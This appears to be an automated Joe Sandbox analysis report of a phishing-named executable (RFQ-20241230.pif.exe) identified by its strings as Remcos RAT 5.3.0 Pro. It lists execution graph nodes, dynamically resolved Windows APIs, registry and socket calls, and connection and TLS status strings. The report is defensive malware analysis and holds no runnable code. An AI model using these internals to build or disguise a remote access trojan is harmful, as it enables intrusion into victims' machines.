                            • Associated: 00000000.00000002.1366672839.0000000009530000.00000004.08000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_9530000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 979940f9721fba77e8576b80e39798e4002ac20f9c22d6e561223cb04ef5b3fb
                            • Instruction ID: 65d205adacfa050a1974c07ce65135217677260df54ab0ac0009307f07252315
                            • Opcode Fuzzy Hash: 979940f9721fba77e8576b80e39798e4002ac20f9c22d6e561223cb04ef5b3fb
                            • Instruction Fuzzy Hash: 2DE11674E002198FDB14CFA9C590AAEFBB2FB88315F248169D955AB316C735AD41CFA0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1367126756.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09530000, based on PE: true
                            • Associated: 00000000.00000002.1366672839.0000000009530000.00000004.08000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_9530000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$B$B
                            • API String ID: 0-685577651
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1364726296.0000000005BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5bd0000_RFQ-20241230.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$B$B
                            • API String ID: 0-685577651

                            Execution Graph

                            Execution Coverage: 3%
                            Dynamic/Decrypted Code Coverage: 0%
                            Signature Coverage: 5.7%
                            Total number of Nodes: 1065
                            Total number of Limit Nodes: 57
47630 40b045 47630->47283 47632 40b055 47631->47632 47634 40b060 47632->47634 47635 40b138 28 API calls 47632->47635 47634->47630 47635->47634 47636->47286 47637->47289 47639 40230d 47638->47639 47640 402325 28 API calls 47639->47640 47641 401f80 47640->47641 47641->46955 47660 43a555 47642->47660 47644 43999b 47669 4392ee 38 API calls 3 library calls 47644->47669 47646 439960 47646->47644 47647 439975 47646->47647 47659 40dd54 47646->47659 47667 445364 20 API calls _abort 47647->47667 47649 43997a 47668 43a837 26 API calls _Deallocate 47649->47668 47652 4399a7 47653 4399d6 47652->47653 47670 43a59a 42 API calls __Toupper 47652->47670 47655 439a42 47653->47655 47671 43a501 26 API calls 2 library calls 47653->47671 47672 43a501 26 API calls 2 library calls 47655->47672 47657 439b09 _strftime 47657->47659 47673 445364 20 API calls _abort 47657->47673 47659->46972 47659->46973 47661 43a55a 47660->47661 47662 43a56d 47660->47662 47674 445364 20 API calls _abort 47661->47674 47662->47646 47664 43a55f 47675 43a837 26 API calls _Deallocate 47664->47675 47666 43a56a 47666->47646 47667->47649 47668->47659 47669->47652 47670->47652 47671->47655 47672->47657 47673->47659 47674->47664 47675->47666 47680 401e9b 47676->47680 47678 4027d9 47678->47328 47679->47332 47681 401ea7 47680->47681 47682 40245c 28 API calls 47681->47682 47683 401eb9 47682->47683 47683->47678 47685 409855 47684->47685 47686 4124b7 3 API calls 47685->47686 47687 40985c 47686->47687 47688 409870 47687->47688 47689 40988a 47687->47689 47691 4095cf 47688->47691 47692 409875 47688->47692 47705 4082dc 28 API calls 47689->47705 47691->47008 47703 4082dc 28 API calls 47692->47703 47693 409898 47706 4098a5 85 API calls 47693->47706 47696 409883 47704 409959 29 API calls 47696->47704 47698 409888 47698->47691 47699->47358 47710 402d8b 47700->47710 47702 4028dd 47702->47361 47703->47696 47704->47698 47707 40999f 129 API calls 47704->47707 47705->47693 47706->47691 47708 4099b5 52 API calls 47706->47708 47709 4099a9 
124 API calls 47706->47709 47711 402d97 47710->47711 47714 4030f7 47711->47714 47713 402dab 47713->47702 47715 403101 47714->47715 47717 403115 47715->47717 47718 4036c2 28 API calls 47715->47718 47717->47713 47718->47717 47720 403b48 47719->47720 47726 403b7a 47720->47726 47723 403cbb 47735 403dc2 47723->47735 47725 403cc9 47725->47369 47727 403b86 47726->47727 47730 403b9e 47727->47730 47729 403b5a 47729->47723 47731 403ba8 47730->47731 47733 403bb3 47731->47733 47734 403cfd 28 API calls 47731->47734 47733->47729 47734->47733 47736 403dce 47735->47736 47739 402ffd 47736->47739 47738 403de3 47738->47725 47740 40300e 47739->47740 47745 4032a4 47740->47745 47744 40302e 47744->47738 47746 4032b0 47745->47746 47747 40301a 47745->47747 47751 4032b6 28 API calls 47746->47751 47747->47744 47750 4035e8 28 API calls 47747->47750 47750->47744 47758 4395ca 47752->47758 47756 4127ed RegSetValueExA RegCloseKey 47755->47756 47757 412814 47755->47757 47756->47757 47757->47392 47761 43954b 47758->47761 47760 401608 47760->47394 47762 43955a 47761->47762 47763 43956e 47761->47763 47769 445364 20 API calls _abort 47762->47769 47768 43956a __alldvrm 47763->47768 47771 447611 11 API calls 2 library calls 47763->47771 47765 43955f 47770 43a837 26 API calls _Deallocate 47765->47770 47768->47760 47769->47765 47770->47768 47771->47768 47775 41aac9 _Yarn ___scrt_fastfail 47772->47775 47773 401f66 28 API calls 47774 41ab3e 47773->47774 47774->47399 47775->47773 47776->47415 47778 413fb3 WSASetLastError 47777->47778 47779 413fa9 47777->47779 47778->47443 47896 413e37 35 API calls ___std_exception_copy 47779->47896 47782 413fae 47782->47778 47784 404206 socket 47783->47784 47785 4041fd 47783->47785 47787 404220 47784->47787 47788 404224 CreateEventW 47784->47788 47897 404262 WSAStartup 47785->47897 47787->47443 47788->47443 47789 404202 47789->47784 47789->47787 47791 4049b1 47790->47791 47792 40492a 47790->47792 47791->47443 47793 404933 47792->47793 47794 404987 CreateEventA CreateThread 
47792->47794 47795 404942 GetLocalTime 47792->47795 47793->47794 47794->47791 47900 404b1d 47794->47900 47898 41ad56 28 API calls 47795->47898 47797 40495b 47899 404c9e 28 API calls 47797->47899 47799 404968 47800 401f66 28 API calls 47799->47800 47801 404977 47800->47801 47802 41a696 79 API calls 47801->47802 47803 40497c 47802->47803 47804 401eea 26 API calls 47803->47804 47804->47794 47806 4043e1 47805->47806 47807 4042b3 47805->47807 47808 404343 47806->47808 47809 4043e7 WSAGetLastError 47806->47809 47807->47808 47811 404cbf 28 API calls 47807->47811 47831 4042e8 47807->47831 47808->47443 47809->47808 47810 4043f7 47809->47810 47812 4043fc 47810->47812 47821 4042f7 47810->47821 47814 4042d4 47811->47814 47915 41bc86 30 API calls 47812->47915 47818 401f66 28 API calls 47814->47818 47816 4042f0 47820 404306 47816->47820 47816->47821 47817 401f66 28 API calls 47822 404448 47817->47822 47823 4042e3 47818->47823 47819 40440b 47916 404c9e 28 API calls 47819->47916 47828 404315 47820->47828 47829 40434c 47820->47829 47821->47817 47825 401f66 28 API calls 47822->47825 47826 41a696 79 API calls 47823->47826 47830 404457 47825->47830 47826->47831 47827 404418 47832 401f66 28 API calls 47827->47832 47833 401f66 28 API calls 47828->47833 47912 420f44 55 API calls 47829->47912 47834 41a696 79 API calls 47830->47834 47904 420161 27 API calls 47831->47904 47836 404427 47832->47836 47837 404324 47833->47837 47834->47808 47839 41a696 79 API calls 47836->47839 47840 401f66 28 API calls 47837->47840 47838 404354 47841 404389 47838->47841 47842 404359 47838->47842 47843 40442c 47839->47843 47844 404333 47840->47844 47914 4202fa 28 API calls 47841->47914 47846 401f66 28 API calls 47842->47846 47847 401eea 26 API calls 47843->47847 47848 41a696 79 API calls 47844->47848 47850 404368 47846->47850 47847->47808 47852 404338 47848->47852 47849 404391 47853 4043be CreateEventW CreateEventW 47849->47853 47855 401f66 28 API calls 47849->47855 47851 401f66 28 API calls 47850->47851 47854 
404377 47851->47854 47905 4201a1 47852->47905 47853->47808 47856 41a696 79 API calls 47854->47856 47858 4043a7 47855->47858 47859 40437c 47856->47859 47860 401f66 28 API calls 47858->47860 47913 4205a2 53 API calls 47859->47913 47862 4043b6 47860->47862 47863 41a696 79 API calls 47862->47863 47864 4043bb 47863->47864 47864->47853 47866 404805 SetEvent CloseHandle 47865->47866 47867 40481c closesocket 47865->47867 47868 40489c 47866->47868 47869 404829 47867->47869 47868->47443 47870 404838 47869->47870 47871 40483f 47869->47871 47919 404ab1 83 API calls 47870->47919 47873 404851 WaitForSingleObject 47871->47873 47874 404892 SetEvent CloseHandle 47871->47874 47875 4201a1 3 API calls 47873->47875 47874->47868 47876 404860 SetEvent WaitForSingleObject 47875->47876 47877 4201a1 3 API calls 47876->47877 47878 404878 SetEvent CloseHandle CloseHandle 47877->47878 47878->47874 47879->47443 47880->47443 47881->47443 47882->47443 47883->47443 47884->47443 47885->47443 47886->47462 47887->47462 47888->47462 47889->47462 47890->47462 47891->47462 47892->47462 47893->47462 47894->47462 47895->47462 47896->47782 47897->47789 47898->47797 47899->47799 47903 404b29 101 API calls 47900->47903 47902 404b26 47903->47902 47904->47816 47906 41dc25 47905->47906 47907 4201a9 47905->47907 47908 41dc33 47906->47908 47917 41cd79 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47906->47917 47907->47808 47918 41d960 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47908->47918 47911 41dc3a 47912->47838 47913->47852 47914->47849 47915->47819 47916->47827 47917->47908 47918->47911 47919->47871 47921->47507 47922->47533 47923->47532 47924->47521 47925->47525 47926->47531 47929 40e56a 47927->47929 47928 4124b7 3 API calls 47928->47929 47929->47928 47930 40e60e 47929->47930 47932 40e5fe Sleep 47929->47932 47937 40e59c 47929->47937 47963 4082dc 28 API calls 47930->47963 47932->47929 47935 41ae18 28 API calls 47935->47937 47936 40e619 47938 41ae18 28 API calls 
47936->47938 47937->47932 47937->47935 47942 401e13 26 API calls 47937->47942 47946 401f66 28 API calls 47937->47946 47949 4126d2 29 API calls 47937->47949 47960 40bf04 73 API calls ___scrt_fastfail 47937->47960 47961 4082dc 28 API calls 47937->47961 47962 412774 29 API calls 47937->47962 47940 40e625 47938->47940 47964 412774 29 API calls 47940->47964 47942->47937 47943 40e638 47944 401e13 26 API calls 47943->47944 47945 40e644 47944->47945 47947 401f66 28 API calls 47945->47947 47946->47937 47948 40e655 47947->47948 47950 4126d2 29 API calls 47948->47950 47949->47937 47951 40e668 47950->47951 47965 411699 TerminateProcess WaitForSingleObject 47951->47965 47953 40e670 ExitProcess 47966 411637 60 API calls 47959->47966 47961->47937 47962->47937 47963->47936 47964->47943 47965->47953

                            Control-flow Graph

                            APIs
                            • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                            • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                            • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                            • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                            • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                            • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                            • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE29
                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
                            • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE73
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleLibraryLoadModule
                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                            • API String ID: 384173800-625181639
                            • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                            • Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
                            • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                            • Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE
                            APIs
                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                              • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                              • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                            • Sleep.KERNELBASE(00000BB8), ref: 0040E603
                            • ExitProcess.KERNEL32 ref: 0040E672
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseExitOpenProcessQuerySleepValue
                            • String ID: 5.3.0 Pro$override$pth_unenc$BG
                            • API String ID: 2281282204-3981147832
                            • Opcode ID: 099a9bf13a86a18ae7ced4af45115ec220a16a2a1b66786f925988895ab02a01
                            • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
                            • Opcode Fuzzy Hash: 099a9bf13a86a18ae7ced4af45115ec220a16a2a1b66786f925988895ab02a01
                            • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF
                            APIs
                            • GetLocalTime.KERNEL32(?), ref: 00404946
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                            • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7
                            Strings
                            • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Create$EventLocalThreadTime
                            • String ID: KeepAlive | Enabled | Timeout:
                            • API String ID: 2532271599-1507639952
                            • Opcode ID: d248886e52a7d0ac6cae50da1f59772ac17be00107f66e41d9b0c0522851940d
                            • Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
                            • Opcode Fuzzy Hash: d248886e52a7d0ac6cae50da1f59772ac17be00107f66e41d9b0c0522851940d
                            • Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA
                            APIs
                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                            • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                            • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$Context$AcquireRandomRelease
                            • String ID:
                            • API String ID: 1815803762-0
                            • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                            • Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
                            • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                            • Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
                            APIs
                            • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7CF
                            • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Name$ComputerUser
                            • String ID:
                            • API String ID: 4229901323-0
                            • Opcode ID: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                            • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                            • Opcode Fuzzy Hash: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                            • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: recv
                            • String ID:
                            • API String ID: 1507349165-0
                            • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                            • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                            • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                            • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                            APIs
                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                              • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                              • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                              • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ-20241230.pif.exe,00000104), ref: 0040D790
                              • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                            • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\RFQ-20241230.pif.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                            • API String ID: 2830904901-113623222
                            • Opcode ID: ec2fbce8c8fdecfb6bd1c00b52c4f5e2366ed6cef1538e238a09c4e97fe47ccc
                            • Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
                            • Opcode Fuzzy Hash: ec2fbce8c8fdecfb6bd1c00b52c4f5e2366ed6cef1538e238a09c4e97fe47ccc
                            • Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                            Control-flow Graph (rendered graph not reproduced in this text export)
                            APIs
                            • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                            • WSAGetLastError.WS2_32 ref: 00414249
                            • Sleep.KERNELBASE(00000000,00000002), ref: 00414B88
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$ErrorLastLocalTime
                            • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Users\user\Desktop\RFQ-20241230.pif.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                            • API String ID: 524882891-2491136596
                            • Opcode ID: 572c934186da3d0baa6f804f271fc78f46c3b558fbe77c50dea129d850f64105
                            • Instruction ID: 1c0fcd5d2769b0c1ed3f5537d8c306574ebe830810c6f13c8178cbf41d879861
                            • Opcode Fuzzy Hash: 572c934186da3d0baa6f804f271fc78f46c3b558fbe77c50dea129d850f64105
                            • Instruction Fuzzy Hash: 3B525E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                            Control-flow Graph

                            APIs
                            • connect.WS2_32(?,?,?), ref: 004042A5
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                            • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                            • API String ID: 994465650-2151626615
                            • Opcode ID: 2601ad7ba584dd83cc4b687a7b2e5622e4b8e2ffaa9cdc4205b416171ec1cd63
